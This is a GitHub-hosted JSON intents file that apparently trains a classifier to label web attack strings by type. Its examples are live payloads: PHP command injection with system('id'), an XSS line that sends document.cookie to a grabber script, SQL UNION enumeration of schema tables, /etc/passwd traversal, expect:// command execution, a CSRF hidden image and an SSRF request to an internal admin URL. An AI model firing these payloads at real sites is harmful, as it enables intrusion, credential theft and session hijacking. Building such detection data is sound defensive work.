-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathcontent.json
45 lines (44 loc) · 2.17 KB
/
content.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
{"intents":
[
{
"tag":"phpinjection",
"input":["/index.php?arg=1; phpinfo()", "/index.php?arg=1; system('id')"],
"responses":["Code Injection PHP"]
},
{
"tag":"portallogin",
"input":["inurl:/doc/page/login.asp?", "inurl:/sap/bc/webdynpro/ logon", "intitle:'ST Web Client'"],
"responses":["Pages Containing Login Portals"]
},
{
"tag":"xsscodevuln",
"input":["<input type='search' value='' />","<input type='search' value='' /><scriptStealCrendetial()</script>' />", "<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>", "<script>alert('XSS')</script>", "<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>"],
"responses":["XSS"]
},
{
"tag":"Sqlinjection",
"input":["'UNION SELECT NULL,NULL,NULL -- -", "'UNION SELECT NULL,NULL,NULL FROM DUAL -- -", "' UNION SELECT @@version -- -", "' UNION SELECT table_name,NULL from INFORMATION_SCHEMA.TABLES -- -", "' UNION SELECT column_name,NULL from INFORMATION_SCHEMA.COLUMNS where table_name='X' -- -", "' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -"],
"responses":["SQL INJECTION"]
},
{
"tag":"lfi",
"input":["foo.php?file=../../../../../../../etc/passwd", "/example1.php?page=expect://ls", ""],
"responses":["LFI"]
},
{
"tag":"csrf",
"input":["<img src = “https://examplebuy.com/shop/purchase?productid=5776&amount=2000&address=45%20Main%20Street%20NJ%20NY” width=“0” height= “0”>"],
"responses":["CSRF"]
},
{
"tag":"securitymisconfiguration",
"input":["DELETE /users/ { 'id':}", "POST /files { 'title':'test.php' 'binary':'BINARY FOR FILE' } "],
"responses":["SECURITY MISCONFIGURATION"]
},
{
"tag":"ssrf",
"input":["POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://192.168.0.68/admin"],
"responses":["SSRF"]
}
]
}